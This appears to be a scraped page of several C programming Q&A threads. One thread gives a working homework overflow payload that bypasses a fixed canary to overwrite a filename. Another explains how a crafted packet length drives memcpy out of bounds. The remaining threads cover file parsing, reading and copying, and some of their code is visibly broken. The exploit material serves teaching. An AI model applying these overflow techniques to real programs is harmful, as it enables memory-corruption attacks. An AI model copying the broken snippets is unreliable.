Exploit a buffer overflow with canary protection - c

I'm trying to exploit this simple program for homework:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define BUFSIZE 1024
typedef struct {
char flag_content[BUFSIZE];
char guess[47];
unsigned canary;
char flag_file[BUFSIZE];
} st_t;
int main(){
FILE *f = NULL;
st_t st = {
.flag_file = "fake_flag",
.canary = 0x4249b876
};
printf("Guess the flag!\n");
scanf("%s", st.guess);
f = fopen(st.flag_file, "rb");
if (f == NULL){
printf("flag error\n");
exit(-1);
}
if (fread(st.flag_content, BUFSIZE, 1, f) < 0){
printf("flag error\n");
exit(-1);
}
if (st.canary != 0x4249b876) {
printf("canary error\n");
exit(-1);
}
if (!strcmp(st.guess, st.flag_content)){
printf("You guessed it right!\n");
} else {
printf("Sorry but the flag is \"%s\"\n", st.flag_content);
}
exit(1);
}
The purpose is to modify the st.flag_file inserting "flag.txt" instead of "fake_flag.txt" to read its content.
It's easy to find out that there is a buffer overflow, but there is also a canary, so I write this exploit as input of the scanf:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAv¸IBflag.txt
I found online that the hexadecimal 0x4249b876 is translated into v¸IB
but when I run the code from my terminal this is the output
./mission1
Guess the flag!
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAv¸IBflag.txt
canary error
and doing a check with gdb I found out that the variable st.flag_file = "flag.txt" that is correct but the variable st.canary = 0x4249b8c2
I cannot understand. Why?

The problem you are having comes from the alignment requirements of the struct. In particular, between the guess and the canary there is extra padding that the compiler is inserting. Try to dump the entire structure and/or the addresses of the members and you will see the padding.
The end result is that you will need more than 47 bytes (A) to reach the canary, typically one more. So instead of, e.g.:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x76\xb8\x49\x42flag
You will need:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x76\xb8\x49\x42flag
Take note, as well, that escaping the characters for the canary might be a good idea (to avoid problems with encoding etc.) and makes it more readable (to compare against the actual canary).
Off-topic Note that:
fread(st.flag_content, BUFSIZE, 1, f) < 0
is always false since fread returns a size_t (unsigned).

Related

reading data from large file into struct in C

I am a beginner to C programming. I need to efficiently read millions of from a file using struct in a file. Below is the example of input file.
2,33.1609992980957,26.59000015258789,8.003999710083008
5,15.85200023651123,13.036999702453613,31.801000595092773
8,10.907999992370605,32.000999450683594,1.8459999561309814
11,28.3700008392334,31.650999069213867,13.107999801635742
I have a current code shown in below, it is giving an error "Error in file"
suggesting the file is NULL but file has data.
#include<stdio.h>
#include<stdlib.h>
struct O_DATA
{
int index;
float x;
float y;
float z;
};
int main ()
{
FILE *infile ;
struct O_DATA input;
infile = fopen("input.dat", "r");
if (infile == NULL);
{
fprintf(stderr,"\nError file\n");
exit(1);
}
while(fread(&input, sizeof(struct O_DATA), 1, infile))
printf("Index = %d X= %f Y=%f Z=%f", input.index , input.x , input.y , input.z);
fclose(infile);
return 0;
}
I need to efficiently read and store data from an input file to process it further. Any help would be really appreciated. Thanks in advnace.
~
~
~
First figure out how to convert one line of text to data
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
struct my_data
{
unsigned int index;
float x;
float y;
float z;
};
struct my_data *
deserialize_data(struct my_data *data, const char *input, const char *separators)
{
char *p;
struct my_data tmp;
if(sscanf(input, "%d,%f,%f,%f", &data->index, &data->x, &data->y, &data->z) != 7)
return NULL;
return data;
}
deserialize_data(struct my_data *data, const char *input, const char *separators)
{
char *p;
struct my_data tmp;
char *str = strdup(input); /* make a copy of the input line because we modify it */
if (!str) { /* I couldn't make a copy so I'll die */
return NULL;
}
p = strtok (str, separators); /* use line for first call to strtok */
if (!p) goto err;
tmp.index = strtoul (p, NULL, 0); /* convert text to integer */
p = strtok (NULL, separators); /* strtok remembers line */
if (!p) goto err;
tmp.x = atof(p);
p = strtok (NULL, separators);
if (!p) goto err;
tmp.y = atof(p);
p = strtok (NULL, separators);
if (!p) goto err;
tmp.z = atof(p);
memcpy(data, &tmp, sizeof(tmp)); /* copy values out */
goto out;
err:
data = NULL;
out:
free (str);
return data;
}
int main() {
struct my_data somedata;
deserialize_data(&somedata, "1,2.5,3.12,7.955", ",");
printf("index: %d, x: %2f, y: %2f, z: %2f\n", somedata.index, somedata.x, somedata.y, somedata.z);
}
Combine it with reading lines from a file:
just the main function here (insert the rest from the previous example)
int
main(int argc, char *argv[])
{
FILE *stream;
char *line = NULL;
size_t len = 0;
ssize_t nread;
struct my_data somedata;
if (argc != 2) {
fprintf(stderr, "Usage: %s <file>\n", argv[0]);
exit(EXIT_FAILURE);
}
stream = fopen(argv[1], "r");
if (stream == NULL) {
perror("fopen");
exit(EXIT_FAILURE);
}
while ((nread = getline(&line, &len, stream)) != -1) {
deserialize_data(&somedata, line, ",");
printf("index: %d, x: %2f, y: %2f, z: %2f\n", somedata.index, somedata.x, somedata.y, somedata.z);
}
free(line);
fclose(stream);
exit(EXIT_SUCCESS);
}
You've got an incorrect ; after your if (infile == NULL) test - try removing that...
[Edit: 2nd by 9 secs! :-)]
if (infile == NULL);
{ /* floating block */ }
The above if is a complete statement that does nothing regardless of the value of infile. The "floating" block is executed no matter what infile contains.
Remove the semicolon to 'attach' the "floating" block to the if
if (infile == NULL)
{ /* if block */ }
You already have solid responses in regard to syntax/structs/etc, but I will offer another method for reading the data in the file itself: I like Martin York's CSVIterator solution. This is my go-to approach for CSV processing because it requires less code to implement and has the added benefit of being easily modifiable (i.e., you can edit the CSVRow and CSVIterator defs depending on your needs).
Here's a mostly complete example using Martin's unedited code without structs or classes. In my opinion, and especially so as a beginner, it is easier to start developing your code with simpler techniques. As your code begins to take shape, it is much clearer why and where you need to implement more abstract/advanced devices.
Note this would technically need to be compiled with C++11 or greater because of my use of std::stod (and maybe some other stuff too I am forgetting), so take that into consideration:
//your includes
//...
#include"wherever_CSVIterator_is.h"
int main (int argc, char* argv[])
{
int index;
double tmp[3]; //since we know the shape of your input data
std::vector<double*> saved = std::vector<double*>();
std::vector<int> indices;
std::ifstream file(argv[1]);
for (CSVIterator loop(file); loop != CSVIterator(); ++loop) { //loop over rows
index = (*loop)[0];
indices.push_back(index); //store int index first, always col 0
for (int k=1; k < (*loop).size(); k++) { //loop across columns
tmp[k-1] = std::stod((*loop)[k]); //save double values now
}
saved.push_back(tmp);
}
/*now we have two vectors of the same 'size'
(let's pretend I wrote a check here to confirm this is true),
so we loop through them together and access with something like:*/
for (int j=0; j < (int)indices.size(); j++) {
double* saved_ptr = saved.at(j); //get pointer to first elem of each triplet
printf("\nindex: %g |", indices.at(j));
for (int k=0; k < 3; k++) {
printf(" %4.3f ", saved_ptr[k]);
}
printf("\n");
}
}
Less fuss to write, but more dangerous (if saved[] goes out of scope, we are in trouble). Also some unnecessary copying is present, but we benefit from using std::vector containers in lieu of knowing exactly how much memory we need to allocate.
Don't give an example of input file. Specify your input file format -at least on paper or in comments- e.g. in EBNF notation (since your example is textual... it is not a binary file). Decide if the numbers have to be in different lines (or if you might accept a file with a single huge line made of million bytes; read about the Comma Separated Values format). Then, code some parser for that format. In your case, it is likely that some very simple recursive descent parsing is enough (and your particular parser won't even use recursion).
Read more about <stdio.h> and its routines. Take time to carefully read that documentation. Since your input is textual, not binary, you don't need fread. Notice that input routines can fail, and you should handle the failure case.
Of course, fopen can fail (e.g. because your working directory is not what you believe it is). You'll better use perror or errno to find more about the failure cause. So at least code:
infile = fopen("input.dat", "r");
if (infile == NULL) {
perror("fopen input.dat");
exit(EXIT_FAILURE);
}
Notice that semi-colons (or their absence) are very important in C (no semi-colon after condition of if). Read again the basic syntax of C language. Read about How to debug small programs. Enable all warnings and debug info when compiling (with GCC, compile with gcc -Wall -g at least). The compiler warnings are very useful!
Remember that fscanf don't handle the end of line (newline) differently from a space character. So if the input has to have different lines you need to read every line separately.
You'll probably read every line using fgets (or getline) and parse every line individually. You could do that parsing with the help of sscanf (perhaps the %n could be useful) - and you want to use the return count of sscanf. You could also perhaps use strtok and/or strtod to do such a parsing.
Make sure that your parsing and your entire program is correct. With current computers (they are very fast, and most of the time your input file sits in the page cache) it is very likely that it would be fast enough. A million lines can be read pretty quickly (if on Linux, you could compare your parsing time with the time used by wc to count the lines of your file). On my computer (a powerful Linux desktop with AMD2970WX processor -it has lots of cores, but your program uses only one-, 64Gbytes of RAM, and SSD disk) a million lines can be read (by wc) in less than 30 milliseconds, so I am guessing your entire program should run in less than half a second, if given a million lines of input, and if the further processing is simple (in linear time).
You are likely to fill a large array of struct O_DATA and that array should probably be dynamically allocated, and reallocated when needed. Read more about C dynamic memory allocation. Read carefully about C memory management routines. They could fail, and you need to handle that failure (even if it is very unlikely to happen). You certainly don't want to re-allocate that array at every loop. You probably could allocate it in some geometrical progression (e.g. if the size of that array is size, you'll call realloc or a new malloc for some int newsize = 4*size/3 + 10; only when the old size is too small). Of course, your array will generally be a bit larger than what is really needed, but memory is quite cheap and you are allowed to "lose" some of it.
But StackOverflow is not a "do my homework" site. I gave some advice above, but you should do your homework.

Getting characters past a certain point in a file in C

I want to take all characters past location 900 from a file called WWW, and put all of these in an array:
//Keep track of all characters past position 900 in WWW.
int Seek900InWWW = lseek(WWW, 900, 0); //goes to position 900 in WWW
printf("%d \n", Seek900InWWW);
if(Seek900InWWW < 0)
printf("Error seeking to position 900 in WWW.txt");
char EverythingPast900[appropriatesize];
int NextRead;
char NextChar[1];
int i = 0;
while((NextRead = read(WWW, NextChar, sizeof(NextChar))) > 0) {
EverythingPast900[i] = NextChar[0];
printf("%c \n", NextChar[0]);
i++;
}
I try to create a char array of length 1, since the read system call requires a pointer, I cannot use a regular char. The above code does not work. In fact, it does not print any characters to the terminal as expected by the loop. I think my logic is correct, but perhaps a misunderstanding of whats going on behind the scenes is what is making this hard for me. Or maybe i missed something simple (hope not).
If you already know how many bytes to read (e.g. in appropriatesize) then just read in that many bytes at once, rather than reading in bytes one at a time.
char everythingPast900[appropriatesize];
ssize_t bytesRead = read(WWW, everythingPast900, sizeof everythingPast900);
if (bytesRead > 0 && bytesRead != appropriatesize)
{
// only everythingPast900[0] to everythingPast900[bytesRead - 1] is valid
}
I made a test version of your code and added bits you left out. Why did you leave them out?
I also made a file named www.txt that has a hundred lines of "This is a test line." in it.
And I found a potential problem, depending on how big your appropriatesize value is and how big the file is. If you write past the end of EverythingPast900 it is possible for you to kill your program and crash it before you ever produce any output to display. That might happen on Windows where stdout may not be line buffered depending on which libraries you used.
See the MSDN setvbuf page, in particular "For some systems, this provides line buffering. However, for Win32, the behavior is the same as _IOFBF - Full Buffering."
This seems to work:
#include <fcntl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
#include <stdio.h>
int main()
{
int WWW = open("www.txt", O_RDONLY);
if(WWW < 0)
printf("Error opening www.txt\n");
//Keep track of all characters past position 900 in WWW.
int Seek900InWWW = lseek(WWW, 900, 0); //goes to position 900 in WWW
printf("%d \n", Seek900InWWW);
if(Seek900InWWW < 0)
printf("Error seeking to position 900 in WWW.txt");
int appropriatesize = 1000;
char EverythingPast900[appropriatesize];
int NextRead;
char NextChar[1];
int i = 0;
while(i < appropriatesize && (NextRead = read(WWW, NextChar, sizeof(NextChar))) > 0) {
EverythingPast900[i] = NextChar[0];
printf("%c \n", NextChar[0]);
i++;
}
return 0;
}
As stated in another answer, read more than one byte. The theory behind "buffers" is to reduce the amount of read/write operations due to how slow disk I/O (or network I/O) is compared to memory speed and CPU speed. Look at it as if it is code and consider which is faster: adding 1 to the file size N times and writing N bytes individually, or adding N to the file size once and writing N bytes at once?
Another thing worth mentioning is the fact that read may read fewer than the number of bytes you requested, even if there is more to read. The answer written by #dreamlax illustrates this fact. If you want, you can use a loop to read as many bytes as possible, filling the buffer. Note that I used a function, but you can do the same thing in your main code:
#include <sys/types.h>
/* Read from a file descriptor, filling the buffer with the requested
* number of bytes. If the end-of-file is encountered, the number of
* bytes returned may be less than the requested number of bytes.
* On error, -1 is returned. See read(2) or read(3) for possible
* values of errno.
* Otherwise, the number of bytes read is returned.
*/
ssize_t
read_fill (int fd, char *readbuf, ssize_t nrequested)
{
ssize_t nread, nsum = 0;
while (nrequested > 0
&& (nread = read (fd, readbuf, nrequested)) > 0)
{
nsum += nread;
nrequested -= nread;
readbuf += nread;
}
return nsum;
}
Note that the buffer is not null-terminated as not all data is necessarily text. You can pass buffer_size - 1 as the requested number of bytes and use the return value to add a null terminator where necessary. This is useful primarily when interacting with functions that will expect a null-terminated string:
char readbuf[4096];
ssize_t n;
int fd;
fd = open ("WWW", O_RDONLY);
if (fd == -1)
{
perror ("unable to open WWW");
exit (1);
}
n = lseek (fd, 900, SEEK_SET);
if (n == -1)
{
fprintf (stderr,
"warning: seek operation failed: %s\n"
" reading 900 bytes instead\n",
strerror (errno));
n = read_fill (fd, readbuf, 900);
if (n < 900)
{
fprintf (stderr, "error: fewer than 900 bytes in file\n");
close (fd);
exit (1);
}
}
/* Read a file, printing its contents to the screen.
*
* Caveat:
* Not safe for UTF-8 or other variable-width/multibyte
* encodings since required bytes may get cut off.
*/
while ((n = read_fill (fd, readbuf, (ssize_t) sizeof readbuf - 1)) > 0)
{
readbuf[n] = 0;
printf ("Read\n****\n%s\n****\n", readbuf);
}
if (n == -1)
{
close (fd);
perror ("error reading from WWW");
exit (1);
}
close (fd);
I could also have avoided the null termination operation and filled all 4096 bytes of the buffer, electing to use the precision part of the format specifiers of printf in this case, changing the format specification from %s to %.4096s. However, this may not be feasible with unusually large buffers (perhaps allocated by malloc to avoid stack overflow) because the buffer size may not be representable with the int type.
Also, you can use a regular char just fine:
char c;
nread = read (fd, &c, 1);
Apparently you didn't know that the unary & operator gets the address of whatever variable is its operand, creating a value of type pointer-to-{typeof var}? Either way, it takes up the same amount of memory, but reading 1 byte at a time is something that normally isn't done as I've explained.
Mixing declarations and code is a no no. Also, no, that is not a valid declaration. C should complain about it along the lines of it being variably defined.
What you want is dynamically allocating the memory for your char buffer[]. You'll have to use pointers.
http://www.ontko.com/pub/rayo/cs35/pointers.html
Then read this one.
http://www.cprogramming.com/tutorial/c/lesson6.html
Then research a function called memcpy().
Enjoy.
Read through that guide, then you should be able to solve your problem in an entirely different way.
Psuedo code.
declare a buffer of char(pointer related)
allocate memory for said buffer(dynamic memory related)
Find location of where you want to start at
point to it(pointer related)
Figure out how much you want to store(technically a part of allocating memory^^^)
Use memcpy() to store what you want in the buffer

Parsing Large File in C

For a class, I've been given the task of writing radix sort in parallel using pthreads, openmp, and MPI. My language of choice in this case is C -- I don't know C++ too well.
Anyways, the way I'm going about reading a text file is causing a segmentation fault at around 500MB file size. The files are line separated 32 bit numbers:
12351
1235234
12
53421
1234
I know C, but I don't know it well; I use things I know, and in this case the things I know are terribly inefficient. My code for reading the text file is as follows:
#include <stdlib.h>
#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <math.h>
int main(int argc, char **argv){
if(argc != 4) {
printf("rs_pthreads requires three arguments to run\n");
return -1;
}
char *fileName=argv[1];
uint32_t radixBits=atoi(argv[2]);
uint32_t numThreads=atoi(argv[3]);
if(radixBits > 32){
printf("radixBitx cannot be greater than 32\n");
return -1;
}
FILE *fileForReading = fopen( fileName, "r" );
if(fileForReading == NULL){
perror("Failed to open the file\n");
return -1;
}
char* charBuff = malloc(1024);
if(charBuff == NULL){
perror("Error with malloc for charBuff");
return -1;
}
uint32_t numNumbers = 0;
while(fgetc(fileForReading) != EOF){
numNumbers++;
fgets(charBuff, 1024, fileForReading);
}
uint32_t numbersToSort[numNumbers];
rewind(fileForReading);
int location;
for(location = 0; location < numNumbers; location++){
fgets(charBuff, 1024, fileForReading);
numbersToSort[location] = atoi(charBuff);
}
At a file of 50 million numbers (~500MB), I'm getting a segmentation fault at rewind of all places. My knowledge of how file streams work is almost non-existent. My guess is it's trying to malloc without enough memory or something, but I don't know.
So, I've got a two parter here: How is rewind segmentation faulting? Am I just doing a poor job before rewind and not checking some system call I should be?
And, what is a more efficient way to read in an arbitrary amount of numbers from a text file?
Any help is appreciated.
I think the most likely cause here is (ironically enough) a stack overflow. Your numbersToSort array is allocated on the stack, and the stack has a fixed size (varies by compiler and operating system, but 1 MB is a typical number). You should dynamically allocate numbersToSort on the heap (which has much more available space) using malloc():
uint32_t *numbersToSort = malloc(sizeof(uint32_t) * numNumbers);
Don't forget to deallocate it later:
free(numbersToSort);
I would also point out that your first-pass loop, which is intended to count the number of lines, will fail if there are any blank lines. This is because on a blank line, the first character is '\n', and fgetc() will consume it; the next call to fgets() will then be reading the following line, and you'll have skipped the blank one in your count.
The problem is in this line
uint32_t numbersToSort[numNumbers];
You are attempting to allocate a huge array in stack, your stack size is in few KBytes (Moreover older C standards don't allow this). So you can try this
uint32_t *numbersToSort; /* Declare it with other declarations */
/* Remove uint32_t numbersToSort[numNumbers]; */
/* Add the code below */
numbersToSort = malloc(sizeof(uint32_t) * numNumbers);
if (!numbersToSort) {
/* No memory; do cleanup and bail out */
return 1;
}

how can i cause a segmentation fault on this program? (to help me find a buffer overflow exploit)

I see that the code below uses memcpy which i can use to exploit this program and cause a buffer overflow, but i cant seem to make it crash. No matter what character argument i pass to it i just get "error opening packet file." Any ideas how?
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <fcntl.h>
#define MAX_ADDR_LEN 128
#define ADDR_LENGTH_OFFSET 4
#define ADDR_OFFSET 8
typedef unsigned char shsize_t;
typedef struct{
char addr[MAX_ADDR_LEN];
shsize_t len;
} arp_addr;
void
print_address(char *packet)
{
arp_addr hwaddr;
int i;
hwaddr.len = (shsize_t) *(packet + ADDR_LENGTH_OFFSET);
memcpy(hwaddr.addr, packet + ADDR_OFFSET, hwaddr.len);
printf("Sender hardware address: ");
for (i = 0; i < hwaddr.len - 1; i ++)
printf("%02hhx::", hwaddr.addr[i]);
printf("%02hhx\n", hwaddr.addr[hwaddr.len - 1]);
return;
}
int main(int argc, char *argv[])
{
struct stat sbuf;
char *packet;
int fd;
if (argc != 2){
printf("Usage: %s <packet file>\n", argv[0]);
return EXIT_FAILURE;
}
if ((stat(argv[1], &sbuf)) < 0){
printf("Error opening packet file\n");
return EXIT_FAILURE;
}
if ((fd = open(argv[1], O_RDONLY)) < 0){
printf("Error opening packet file\n");
return EXIT_FAILURE;
}
if ((packet = (char *)malloc(sbuf.st_size * sizeof(char))) == NULL){
printf("Error allocating memory\n");
return EXIT_FAILURE;
}
if (read(fd, packet, sbuf.st_size) < 0){
printf("Error reading packet from file\n");
return EXIT_FAILURE;
}
close(fd);
print_address(packet);
free(packet);
return EXIT_SUCCESS;
}
When you do something like write past the end of a buffer there is no guarantee that the program will crash. This is called undefined behavior, which literally means that you can make no reasonable assumptions as to what will happen.
The program itself appears relatively well behaved. As long as len is calculated properly I don't see any way for you to cause an overrun via input. Just because a program uses memcpy doesn't mean that it is vulnerable to attack. The only attack vector I see is if you pass it a carefully crafted file such that the length is calculated incorrectly:
hwaddr.len = (shsize_t) *(packet + ADDR_LENGTH_OFFSET)
In this line the program reads ADDR_LENGTH_OFFSET bytes from the address of packet to get the data length. Obviously that is problematic if you craft a file with an erroneous value for the data length in the header (i.e., a data length > MAX_ADDR_LEN).
BTW, the argument is a file, not a character. You won't be able to do anything passing it nonsense input because read will fail.
No matter what character argument i pass to it i just get "error
opening packet file."
You need to pass a valid file name as an argument, not random characters.
As others have indicated, the memcpy() isn't the security problem. The problem is that the length parameter passed to memcpy() comes from user input (the file you specified). If you specify a file that has a length field of, say, a billion, you will probably see a crash (and, yes, 'crash' is accepted vernacular).
Since there is rather limited checking on the size of the packet, you can pass it the name of an empty or very short file and the print_address() code will mess around out of bounds.
Also, since the code reads a length from the data read from the file, you can place an arbitrary number at relevant position and make the code go running around most places in memory.

Tried and true simple file copying code in C?

This looks like a simple question, but I didn't find anything similar here.
Since there is no file copy function in C, we have to implement file copying ourselves, but I don't like reinventing the wheel even for trivial stuff like that, so I'd like to ask the cloud:
What code would you recommend for file copying using fopen()/fread()/fwrite()?
What code would you recommend for file copying using open()/read()/write()?
This code should be portable (windows/mac/linux/bsd/qnx/younameit), stable, time tested, fast, memory efficient and etc. Getting into specific system's internals to squeeze some more performance is welcomed (like getting filesystem cluster size).
This seems like a trivial question but, for example, source code for CP command isn't 10 lines of C code.
This is the function I use when I need to copy from one file to another - with test harness:
/*
#(#)File: $RCSfile: fcopy.c,v $
#(#)Version: $Revision: 1.11 $
#(#)Last changed: $Date: 2008/02/11 07:28:06 $
#(#)Purpose: Copy the rest of file1 to file2
#(#)Author: J Leffler
#(#)Modified: 1991,1997,2000,2003,2005,2008
*/
/*TABSTOP=4*/
#include "jlss.h"
#include "stderr.h"
#ifndef lint
/* Prevent over-aggressive optimizers from eliminating ID string */
const char jlss_id_fcopy_c[] = "#(#)$Id: fcopy.c,v 1.11 2008/02/11 07:28:06 jleffler Exp $";
#endif /* lint */
void fcopy(FILE *f1, FILE *f2)
{
char buffer[BUFSIZ];
size_t n;
while ((n = fread(buffer, sizeof(char), sizeof(buffer), f1)) > 0)
{
if (fwrite(buffer, sizeof(char), n, f2) != n)
err_syserr("write failed\n");
}
}
#ifdef TEST
int main(int argc, char **argv)
{
FILE *fp1;
FILE *fp2;
err_setarg0(argv[0]);
if (argc != 3)
err_usage("from to");
if ((fp1 = fopen(argv[1], "rb")) == 0)
err_syserr("cannot open file %s for reading\n", argv[1]);
if ((fp2 = fopen(argv[2], "wb")) == 0)
err_syserr("cannot open file %s for writing\n", argv[2]);
fcopy(fp1, fp2);
return(0);
}
#endif /* TEST */
Clearly, this version uses file pointers from standard I/O and not file descriptors, but it is reasonably efficient and about as portable as it can be.
Well, except the error function - that's peculiar to me. As long as you handle errors cleanly, you should be OK. The "jlss.h" header declares fcopy(); the "stderr.h" header declares err_syserr() amongst many other similar error reporting functions. A simple version of the function follows - the real one adds the program name and does some other stuff.
#include "stderr.h"
#include <stdarg.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
void err_syserr(const char *fmt, ...)
{
int errnum = errno;
va_list args;
va_start(args, fmt);
vfprintf(stderr, fmt, args);
va_end(args);
if (errnum != 0)
fprintf(stderr, "(%d: %s)\n", errnum, strerror(errnum));
exit(1);
}
The code above may be treated as having a modern BSD license or GPL v3 at your choice.
As far as the actual I/O goes, the code I've written a million times in various guises for copying data from one stream to another goes something like this. It returns 0 on success, or -1 with errno set on error (in which case any number of bytes might have been copied).
Note that for copying regular files, you can skip the EAGAIN stuff, since regular files are always blocking I/O. But inevitably if you write this code, someone will use it on other types of file descriptors, so consider it a freebie.
There's a file-specific optimisation that GNU cp does, which I haven't bothered with here, that for long blocks of 0 bytes instead of writing you just extend the output file by seeking off the end.
void block(int fd, int event) {
pollfd topoll;
topoll.fd = fd;
topoll.events = event;
poll(&topoll, 1, -1);
// no need to check errors - if the stream is bust then the
// next read/write will tell us
}
int copy_data_buffer(int fdin, int fdout, void *buf, size_t bufsize) {
for(;;) {
void *pos;
// read data to buffer
ssize_t bytestowrite = read(fdin, buf, bufsize);
if (bytestowrite == 0) break; // end of input
if (bytestowrite == -1) {
if (errno == EINTR) continue; // signal handled
if (errno == EAGAIN) {
block(fdin, POLLIN);
continue;
}
return -1; // error
}
// write data from buffer
pos = buf;
while (bytestowrite > 0) {
ssize_t bytes_written = write(fdout, pos, bytestowrite);
if (bytes_written == -1) {
if (errno == EINTR) continue; // signal handled
if (errno == EAGAIN) {
block(fdout, POLLOUT);
continue;
}
return -1; // error
}
bytestowrite -= bytes_written;
pos += bytes_written;
}
}
return 0; // success
}
// Default value. I think it will get close to maximum speed on most
// systems, short of using mmap etc. But porters / integrators
// might want to set it smaller, if the system is very memory
// constrained and they don't want this routine to starve
// concurrent ops of memory. And they might want to set it larger
// if I'm completely wrong and larger buffers improve performance.
// It's worth trying several MB at least once, although with huge
// allocations you have to watch for the linux
// "crash on access instead of returning 0" behaviour for failed malloc.
#ifndef FILECOPY_BUFFER_SIZE
#define FILECOPY_BUFFER_SIZE (64*1024)
#endif
int copy_data(int fdin, int fdout) {
// optional exercise for reader: take the file size as a parameter,
// and don't use a buffer any bigger than that. This prevents
// memory-hogging if FILECOPY_BUFFER_SIZE is very large and the file
// is small.
for (size_t bufsize = FILECOPY_BUFFER_SIZE; bufsize >= 256; bufsize /= 2) {
void *buffer = malloc(bufsize);
if (buffer != NULL) {
int result = copy_data_buffer(fdin, fdout, buffer, bufsize);
free(buffer);
return result;
}
}
// could use a stack buffer here instead of failing, if desired.
// 128 bytes ought to fit on any stack worth having, but again
// this could be made configurable.
return -1; // errno is ENOMEM
}
To open the input file:
int fdin = open(infile, O_RDONLY|O_BINARY, 0);
if (fdin == -1) return -1;
Opening the output file is tricksy. As a basis, you want:
int fdout = open(outfile, O_WRONLY|O_BINARY|O_CREAT|O_TRUNC, 0x1ff);
if (fdout == -1) {
close(fdin);
return -1;
}
But there are confounding factors:
you need to special-case when the files are the same, and I can't remember how to do that portably.
if the output filename is a directory, you might want to copy the file into the directory.
if the output file already exists (open with O_EXCL to determine this and check for EEXIST on error), you might want to do something different, as cp -i does.
you might want the permissions of the output file to reflect those of the input file.
you might want other platform-specific meta-data to be copied.
you may or may not wish to unlink the output file on error.
Obviously the answers to all these questions could be "do the same as cp". In which case the answer to the original question is "ignore everything I or anyone else has said, and use the source of cp".
Btw, getting the filesystem's cluster size is next to useless. You'll almost always see speed increasing with buffer size long after you've passed the size of a disk block.
the size of each read need to be a multiple of 512 ( sector size ) 4096 is a good one
Here is a very easy and clear example: Copy a file. Since it is written in ANSI-C without any particular function calls I think this one would be pretty much portable.
Depending on what you mean by copying a file, it is certainly far from trivial. If you mean copying the content only, then there is almost nothing to do. But generally, you need to copy the metadata of the file, and that's surely platform dependent. I don't know of any C library which does what you want in a portable manner. Just handling the filename by itself is no trivial matter if you care about portability.
In C++, there is the file library in boost
One thing I found when implementing my own file copy, and it seems obvious but it's not: I/O's are slow. You can pretty much time your copy's speed by how many of them you do. So clearly you need to do as few of them as possible.
The best results I found were when I got myself a ginourmous buffer, read the entire source file into it in one I/O, then wrote the entire buffer back out of it in one I/O. If I even had to do it in 10 batches, it got way slow. Trying to read and write out each byte, like a naieve coder might try first, was just painful.
The accepted answer written by Steve Jessop does not answer to the first part of the quession, Jonathan Leffler do it, but do it wrong: code should be written as
while ((n = fread(buffer, 1, sizeof(buffer), f1)) > 0)
if (fwrite(buffer, n, 1, f2) != 1)
/* we got write error here */
/* test ferror(f1) for a read errors */
Explanation:
sizeof(char) = 1 by definition, always: it does not matter how many bits in it, 8 (in most cases), 9, 11 or 32 (on some DSP, for example) — size of char is one. Note, it is not an error here, but an extra code.
The fwrite function writes upto nmemb (second argument) elements of specified size (third argument), it does not required to write exactly nmemb elements. To fix this you must write the rest of the data readed or just write one element of size n — let fwrite do all his work. (This item is in question, should fwrite write all data or not, but in my version short writes impossible until error occurs.)
You should test for a read errors too: just test ferror(f1) at the end of loop.
Note, you probably need to disable buffering on both input and output files to prevent triple buffering: first on read to f1 buffer, second in our code, third on write to f2 buffer:
setvbuf(f1, NULL, _IONBF, 0);
setvbuf(f2, NULL, _IONBF, 0);
(Internal buffers should, probably, be of size BUFSIZ.)

Resources